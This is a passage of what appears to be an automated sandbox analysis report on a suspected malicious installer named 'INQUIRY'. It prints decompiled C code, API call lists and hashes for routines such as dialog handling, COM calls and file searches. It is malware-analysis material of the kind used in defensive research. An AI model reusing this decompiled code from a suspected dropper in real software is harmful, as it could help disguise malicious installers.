                          						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                          						_t54 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                          						_t81 =  *(_t100 - 0x14);
                          						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                          						if(_t58 != 0) {
                          							_t88 =  *((intOrPtr*)(_t100 + 8));
                          							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                          							_t81 =  *(_t100 - 0x14);
                          						}
                          						_t59 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                          						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                          							_t71 =  *((intOrPtr*)(_t100 + 8));
                          							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                          						}
                          						_t62 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                          						_t64 =  *((intOrPtr*)(_t100 + 8));
                          						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                          						if(_t95 >= _t75) {
                          							_t95 = 0x80004005;
                          							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                          								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                          								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                          							}
                          						}
                          						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                          						 *((intOrPtr*)( *_t66 + 8))(_t66);
                          					}
                          					_t50 =  *((intOrPtr*)(_t100 + 8));
                          					 *((intOrPtr*)( *_t50 + 8))(_t50);
                          					if(_t95 >= _t75) {
                          						_push(0xfffffff4);
                          					} else {
                          						goto L13;
                          					}
                          				}
                          				E00401423();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                          				return 0;
                          			}





















                          0x0040201b
                          0x00402025
                          0x0040202e
                          0x00402038
                          0x00402041
                          0x0040204b
                          0x0040204f
                          0x0040204f
                          0x00402054
                          0x00402065
                          0x0040206d
                          0x0040214d
                          0x0040214d
                          0x00402154
                          0x00402073
                          0x00402073
                          0x00402084
                          0x00402088
                          0x0040208e
                          0x00402098
                          0x0040209a
                          0x004020a5
                          0x004020a8
                          0x004020b5
                          0x004020b7
                          0x004020b9
                          0x004020c0
                          0x004020c3
                          0x004020c3
                          0x004020c6
                          0x004020d0
                          0x004020d8
                          0x004020dd
                          0x004020e9
                          0x004020e9
                          0x004020ec
                          0x004020f5
                          0x004020f8
                          0x00402101
                          0x00402106
                          0x00402118
                          0x00402127
                          0x00402129
                          0x00402135
                          0x00402135
                          0x00402127
                          0x00402137
                          0x0040213d
                          0x0040213d
                          0x00402140
                          0x00402146
                          0x0040214b
                          0x00402160
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040214b
                          0x00402156
                          0x00402880
                          0x0040288c

                          APIs
                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 123533781-47812868
                          • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                          • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E00402630(char __ebx, char* __edi, char* __esi) {
                          				void* _t19;
                          
                          				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                          					E004059E3(__edi, _t6);
                          					_push(_t19 - 0x178);
                          					_push(__esi);
                          					E00405A85();
                          				} else {
                          					 *__edi = __ebx;
                          					 *__esi = __ebx;
                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                          				return 0;
                          			}




                          0x00402648
                          0x0040265c
                          0x00402667
                          0x00402668
                          0x004027a3
                          0x0040264a
                          0x0040264a
                          0x0040264c
                          0x0040264e
                          0x0040264e
                          0x00402880
                          0x0040288c

                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                          • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                          • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                          • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb9343edb79864026b3d50e65115d794073cb4cf1aed3092053309e1c1d36ce6
                          • Instruction ID: c6204df5a1538db9627ffe0020e3f6d58d2ec67b46903b88f61a889bff28e361
                          • Opcode Fuzzy Hash: eb9343edb79864026b3d50e65115d794073cb4cf1aed3092053309e1c1d36ce6
                          • Instruction Fuzzy Hash: 9FE1F254C5D2E9ADDB06CBF945643FCBFB05D2A102F0845CAE0E5E6283C53A934EDB25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                          • Instruction ID: ce5107af4373d84ad1ec0dd0d75e915d0a40e693e57723f6d455b4a1e9d74ae4
                          • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                          • Instruction Fuzzy Hash: 4E11E975A00114AFCB20DFADC8989AEF7FDEF89698B554065F809D3314E774DE40C6A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                          • Instruction ID: 4bb4f0fbc797876815e24c5772a70c14e7ed46739587e967e6b2a6def793cc95
                          • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                          • Instruction Fuzzy Hash: F6E012397A45459FC754CBA8C951E65B3F4EB1D360B154294F815C73A1EB34ED00DA50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                          • Instruction ID: 79a49d33a732b5ea980f3e3ade6f1cc643607616e4a3787014113af3834afba4
                          • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                          • Instruction Fuzzy Hash: C2E0863E3506508FC320DA59D990A52F3E9FB8C2B07154869E99AD3711C330FC00CE50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                          				struct HWND__* _v32;
                          				void* _v84;
                          				void* _v88;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t35;
                          				signed int _t37;
                          				signed int _t39;
                          				intOrPtr _t44;
                          				struct HWND__* _t49;
                          				signed int _t67;
                          				struct HWND__* _t73;
                          				signed int _t86;
                          				struct HWND__* _t91;
                          				signed int _t99;
                          				int _t103;
                          				signed int _t115;
                          				signed int _t116;
                          				int _t117;
                          				signed int _t122;
                          				struct HWND__* _t125;
                          				struct HWND__* _t126;
                          				int _t127;
                          				long _t130;
                          				int _t132;
                          				int _t133;
                          				void* _t134;
                          				void* _t142;
                          
                          				_t115 = _a8;
                          				if(_t115 == 0x110 || _t115 == 0x408) {
                          					_t35 = _a12;
                          					_t125 = _a4;
                          					__eflags = _t115 - 0x110;
                          					 *0x42047c = _t35;
                          					if(_t115 == 0x110) {
                          						 *0x423ea8 = _t125;
                          						 *0x420490 = GetDlgItem(_t125, 1);
                          						_t91 = GetDlgItem(_t125, 2);
                          						_push(0xffffffff);
                          						_push(0x1c);
                          						 *0x41f458 = _t91;
                          						E00403E37(_t125);
                          						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                          						 *0x42366c = E0040140B(4);
                          						_t35 = 1;
                          						__eflags = 1;
                          						 *0x42047c = 1;
                          					}
                          					_t122 =  *0x4091bc; // 0xffffffff
                          					_t133 = 0;
                          					_t130 = (_t122 << 6) +  *0x423ec0;
                          					__eflags = _t122;
                          					if(_t122 < 0) {
                          						L34:
                          						E00403E83(0x40b);
                          						while(1) {
                          							_t37 =  *0x42047c;
                          							 *0x4091bc =  *0x4091bc + _t37;
                          							_t130 = _t130 + (_t37 << 6);
                          							_t39 =  *0x4091bc; // 0xffffffff
                          							__eflags = _t39 -  *0x423ec4; // 0x2
                          							if(__eflags == 0) {
                          								E0040140B(1);
                          							}
                          							__eflags =  *0x42366c - _t133; // 0x0
                          							if(__eflags != 0) {
                          								break;
                          							}
                          							_t44 =  *0x423ec4; // 0x2
                          							__eflags =  *0x4091bc - _t44; // 0xffffffff
                          							if(__eflags >= 0) {
                          								break;
                          							}
                          							_t116 =  *(_t130 + 0x14);
                          							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                          							_push( *((intOrPtr*)(_t130 + 0x20)));
                          							_push(0xfffffc19);
                          							E00403E37(_t125);
                          							_push( *((intOrPtr*)(_t130 + 0x1c)));
                          							_push(0xfffffc1b);
                          							E00403E37(_t125);
                          							_push( *((intOrPtr*)(_t130 + 0x28)));
                          							_push(0xfffffc1a);
                          							E00403E37(_t125);
                          							_t49 = GetDlgItem(_t125, 3);
                          							__eflags =  *0x423f2c - _t133; // 0x0
                          							_v32 = _t49;
                          							if(__eflags != 0) {
                          								_t116 = _t116 & 0x0000fefd | 0x00000004;
                          								__eflags = _t116;
                          							}
                          							ShowWindow(_t49, _t116 & 0x00000008);
                          							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                          							E00403E59(_t116 & 0x00000002);
                          							_t117 = _t116 & 0x00000004;
                          							EnableWindow( *0x41f458, _t117);
                          							__eflags = _t117 - _t133;
                          							if(_t117 == _t133) {
                          								_push(1);
                          							} else {
                          								_push(_t133);
                          							}
                          							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                          							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                          							__eflags =  *0x423f2c - _t133; // 0x0
                          							if(__eflags == 0) {
                          								_push( *0x420490);
                          							} else {
                          								SendMessageA(_t125, 0x401, 2, _t133);
                          								_push( *0x41f458);
                          							}
                          							E00403E6C();
                          							E00405A85(0x420498, "heifsmlbdxlebvytfzg Setup");
                          							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                          							SetWindowTextA(_t125, 0x420498);
                          							_push(_t133);
                          							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                          							__eflags = _t67;
                          							if(_t67 != 0) {
                          								continue;
                          							} else {
                          								__eflags =  *_t130 - _t133;
                          								if( *_t130 == _t133) {
                          									continue;
                          								}
                          								__eflags =  *(_t130 + 4) - 5;
                          								if( *(_t130 + 4) != 5) {
                          									DestroyWindow( *0x423678);
                          									 *0x41fc68 = _t130;
                          									__eflags =  *_t130 - _t133;
                          									if( *_t130 <= _t133) {
                          										goto L58;
                          									}
                          									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                          									__eflags = _t73 - _t133;
                          									 *0x423678 = _t73;
                          									if(_t73 == _t133) {
                          										goto L58;
                          									}
                          									_push( *((intOrPtr*)(_t130 + 0x2c)));
                          									_push(6);
                          									E00403E37(_t73);
                          									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                          									ScreenToClient(_t125, _t134 + 0x10);
                          									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                          									_push(_t133);
                          									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                          									__eflags =  *0x42366c - _t133; // 0x0
                          									if(__eflags != 0) {
                          										goto L61;
                          									}
                          									ShowWindow( *0x423678, 8);
                          									E00403E83(0x405);
                          									goto L58;
                          								}
                          								__eflags =  *0x423f2c - _t133; // 0x0
                          								if(__eflags != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *0x423f20 - _t133; // 0x0
                          								if(__eflags != 0) {
                          									continue;
                          								}
                          								goto L61;
                          							}
                          						}
                          						DestroyWindow( *0x423678);
                          						 *0x423ea8 = _t133;
                          						EndDialog(_t125,  *0x41f860);
                          						goto L58;
                          					} else {
                          						__eflags = _t35 - 1;
                          						if(_t35 != 1) {
                          							L33:
                          							__eflags =  *_t130 - _t133;
                          							if( *_t130 == _t133) {
                          								goto L61;
                          							}
                          							goto L34;
                          						}
                          						_push(0);
                          						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                          						__eflags = _t86;
                          						if(_t86 == 0) {
                          							goto L33;
                          						}
                          						SendMessageA( *0x423678, 0x40f, 0, 1);
                          						__eflags =  *0x42366c - _t133; // 0x0
                          						return 0 | __eflags == 0x00000000;
                          					}
                          				} else {
                          					_t125 = _a4;
                          					_t133 = 0;
                          					if(_t115 == 0x47) {
                          						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                          					}
                          					if(_t115 == 5) {
                          						asm("sbb eax, eax");
                          						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                          					}
                          					if(_t115 != 0x40d) {
                          						__eflags = _t115 - 0x11;
                          						if(_t115 != 0x11) {
                          							__eflags = _t115 - 0x111;
                          							if(_t115 != 0x111) {
                          								L26:
                          								return E00403E9E(_t115, _a12, _a16);
                          							}
                          							_t132 = _a12 & 0x0000ffff;
                          							_t126 = GetDlgItem(_t125, _t132);
                          							__eflags = _t126 - _t133;
                          							if(_t126 == _t133) {
                          								L13:
                          								__eflags = _t132 - 1;
                          								if(_t132 != 1) {
                          									__eflags = _t132 - 3;
                          									if(_t132 != 3) {
                          										_t127 = 2;
                          										__eflags = _t132 - _t127;
                          										if(_t132 != _t127) {
                          											L25:
                          											SendMessageA( *0x423678, 0x111, _a12, _a16);
                          											goto L26;
                          										}
                          										__eflags =  *0x423f2c - _t133; // 0x0
                          										if(__eflags == 0) {
                          											_t99 = E0040140B(3);
                          											__eflags = _t99;
                          											if(_t99 != 0) {
                          												goto L26;
                          											}
                          											 *0x41f860 = 1;
                          											L21:
                          											_push(0x78);
                          											L22:
                          											E00403E10();
                          											goto L26;
                          										}
                          										E0040140B(_t127);
                          										 *0x41f860 = _t127;
                          										goto L21;
                          									}
                          									__eflags =  *0x4091bc - _t133; // 0xffffffff
                          									if(__eflags <= 0) {
                          										goto L25;
                          									}
                          									_push(0xffffffff);
                          									goto L22;
                          								}
                          								_push(_t132);
                          								goto L22;
                          							}
                          							SendMessageA(_t126, 0xf3, _t133, _t133);
                          							_t103 = IsWindowEnabled(_t126);
                          							__eflags = _t103;
                          							if(_t103 == 0) {
                          								goto L61;
                          							}
                          							goto L13;
                          						}
                          						SetWindowLongA(_t125, _t133, _t133);
                          						return 1;
                          					} else {
                          						DestroyWindow( *0x423678);
                          						 *0x423678 = _a12;
                          						L58:
                          						if( *0x421498 == _t133) {
                          							_t142 =  *0x423678 - _t133; // 0x0
                          							if(_t142 != 0) {
                          								ShowWindow(_t125, 0xa);
                          								 *0x421498 = 1;
                          							}
                          						}
                          						L61:
                          						return 0;
                          					}
                          				}
                          			}
































                          0x0040396d
                          0x00403976
                          0x00403ab7
                          0x00403abb
                          0x00403abf
                          0x00403ac1
                          0x00403ac6
                          0x00403ad1
                          0x00403adc
                          0x00403ae1
                          0x00403ae3
                          0x00403ae5
                          0x00403ae8
                          0x00403aed
                          0x00403afb
                          0x00403b08
                          0x00403b0f
                          0x00403b0f
                          0x00403b10
                          0x00403b10
                          0x00403b15
                          0x00403b1b
                          0x00403b22
                          0x00403b28
                          0x00403b2a
                          0x00403b6a
                          0x00403b6f
                          0x00403b74
                          0x00403b74
                          0x00403b79
                          0x00403b82
                          0x00403b84
                          0x00403b89
                          0x00403b8f
                          0x00403b93
                          0x00403b93
                          0x00403b98
                          0x00403b9e
                          0x00000000
                          0x00000000
                          0x00403ba4
                          0x00403ba9
                          0x00403baf
                          0x00000000
                          0x00000000
                          0x00403bb8
                          0x00403bc0
                          0x00403bc5
                          0x00403bc8
                          0x00403bce
                          0x00403bd3
                          0x00403bd6
                          0x00403bdc
                          0x00403be1
                          0x00403be4
                          0x00403bea
                          0x00403bf2
                          0x00403bf8
                          0x00403bfe
                          0x00403c02
                          0x00403c09
                          0x00403c09
                          0x00403c09
                          0x00403c13
                          0x00403c25
                          0x00403c31
                          0x00403c36
                          0x00403c40
                          0x00403c46
                          0x00403c48
                          0x00403c4d
                          0x00403c4a
                          0x00403c4a
                          0x00403c4a
                          0x00403c5d
                          0x00403c75
                          0x00403c77
                          0x00403c7d
                          0x00403c92
                          0x00403c7f
                          0x00403c88
                          0x00403c8a
                          0x00403c8a
                          0x00403c98
                          0x00403ca8
                          0x00403cb9
                          0x00403cc0
                          0x00403cc6
                          0x00403cca
                          0x00403ccf
                          0x00403cd1
                          0x00000000
                          0x00403cd7
                          0x00403cd7
                          0x00403cd9
                          0x00000000
                          0x00000000
                          0x00403cdf
                          0x00403ce3
                          0x00403d08
                          0x00403d0e
                          0x00403d14
                          0x00403d16
                          0x00000000
                          0x00000000
                          0x00403d3c
                          0x00403d42
                          0x00403d44
                          0x00403d49
                          0x00000000
                          0x00000000
                          0x00403d4f
                          0x00403d52
                          0x00403d55
                          0x00403d6c
                          0x00403d78
                          0x00403d91
                          0x00403d97
                          0x00403d9b
                          0x00403da0
                          0x00403da6
                          0x00000000
                          0x00000000
                          0x00403db0
                          0x00403dbb
                          0x00000000
                          0x00403dbb
                          0x00403ce5
                          0x00403ceb
                          0x00000000
                          0x00000000
                          0x00403cf1
                          0x00403cf7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403cfd
                          0x00403cd1
                          0x00403dc8
                          0x00403dd4
                          0x00403ddb
                          0x00000000
                          0x00403b2c
                          0x00403b2c
                          0x00403b2f
                          0x00403b62
                          0x00403b62
                          0x00403b64
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403b64
                          0x00403b31
                          0x00403b35
                          0x00403b3a
                          0x00403b3c
                          0x00000000
                          0x00000000
                          0x00403b4c
                          0x00403b54
                          0x00000000
                          0x00403b5a
                          0x00403988
                          0x00403988
                          0x0040398c
                          0x00403991
                          0x004039a0
                          0x004039a0
                          0x004039a9
                          0x004039b2
                          0x004039bd
                          0x004039bd
                          0x004039c9
                          0x004039e5
                          0x004039e8
                          0x004039fb
                          0x00403a01
                          0x00403aa4
                          0x00000000
                          0x00403aad
                          0x00403a07
                          0x00403a14
                          0x00403a16
                          0x00403a18
                          0x00403a37
                          0x00403a37
                          0x00403a3a
                          0x00403a3f
                          0x00403a42
                          0x00403a52
                          0x00403a53
                          0x00403a55
                          0x00403a8b
                          0x00403a9e
                          0x00000000
                          0x00403a9e
                          0x00403a57
                          0x00403a5d
                          0x00403a76
                          0x00403a7b
                          0x00403a7d
                          0x00000000
                          0x00000000
                          0x00403a7f
                          0x00403a6b
                          0x00403a6b
                          0x00403a6d
                          0x00403a6d
                          0x00000000
                          0x00403a6d
                          0x00403a60
                          0x00403a65
                          0x00000000
                          0x00403a65
                          0x00403a44
                          0x00403a4a
                          0x00000000
                          0x00000000
                          0x00403a4c
                          0x00000000
                          0x00403a4c
                          0x00403a3c
                          0x00000000
                          0x00403a3c
                          0x00403a22
                          0x00403a29
                          0x00403a2f
                          0x00403a31
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403a31
                          0x004039ed
                          0x00000000
                          0x004039cb
                          0x004039d1
                          0x004039db
                          0x00403de1
                          0x00403de7
                          0x00403de9
                          0x00403def
                          0x00403df4
                          0x00403dfa
                          0x00403dfa
                          0x00403def
                          0x00403e04
                          0x00000000
                          0x00403e04
                          0x004039c9

                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                          • ShowWindow.USER32(?), ref: 004039BD
                          • DestroyWindow.USER32 ref: 004039D1
                          • SetWindowLongA.USER32 ref: 004039ED
                          • GetDlgItem.USER32 ref: 00403A0E
                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                          • IsWindowEnabled.USER32(00000000), ref: 00403A29
                          • GetDlgItem.USER32 ref: 00403AD7
                          • GetDlgItem.USER32 ref: 00403AE1
                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                          • GetDlgItem.USER32 ref: 00403BF2
                          • ShowWindow.USER32(00000000,?), ref: 00403C13
                          • EnableWindow.USER32(?,?), ref: 00403C25
                          • EnableWindow.USER32(?,?), ref: 00403C40
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                          • EnableMenuItem.USER32 ref: 00403C5D
                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                          • lstrlenA.KERNEL32(00420498,?,00420498,heifsmlbdxlebvytfzg Setup), ref: 00403CB1
                          • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                          • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                          Strings
                          • heifsmlbdxlebvytfzg Setup, xrefs: 00403CA2
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID: heifsmlbdxlebvytfzg Setup
                          • API String ID: 184305955-4100266025
                          • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                          • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                          				char _v8;
                          				signed int _v12;
                          				void* _v16;
                          				struct HWND__* _t52;
                          				intOrPtr _t71;
                          				intOrPtr _t85;
                          				long _t86;
                          				int _t98;
                          				struct HWND__* _t99;
                          				signed int _t100;
                          				intOrPtr _t103;
                          				intOrPtr _t107;
                          				intOrPtr _t109;
                          				int _t110;
                          				signed int* _t112;
                          				signed int _t113;
                          				char* _t114;
                          				CHAR* _t115;
                          
                          				if(_a8 != 0x110) {
                          					if(_a8 != 0x111) {
                          						L11:
                          						if(_a8 != 0x4e) {
                          							if(_a8 == 0x40b) {
                          								 *0x420478 =  *0x420478 + 1;
                          							}
                          							L25:
                          							_t110 = _a16;
                          							L26:
                          							return E00403E9E(_a8, _a12, _t110);
                          						}
                          						_t52 = GetDlgItem(_a4, 0x3e8);
                          						_t110 = _a16;
                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                          							_v12 = _t100;
                          							_v16 = _t109;
                          							_v8 = 0x422e40;
                          							if(_t100 - _t109 < 0x800) {
                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                          								SetCursor(LoadCursorA(0, 0x7f02));
                          								_t40 =  &_v8; // 0x422e40
                          								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                          								SetCursor(LoadCursorA(0, 0x7f00));
                          								_t110 = _a16;
                          							}
                          						}
                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                          							goto L26;
                          						} else {
                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                          								SendMessageA( *0x423ea8, 0x111, 1, 0);
                          							}
                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
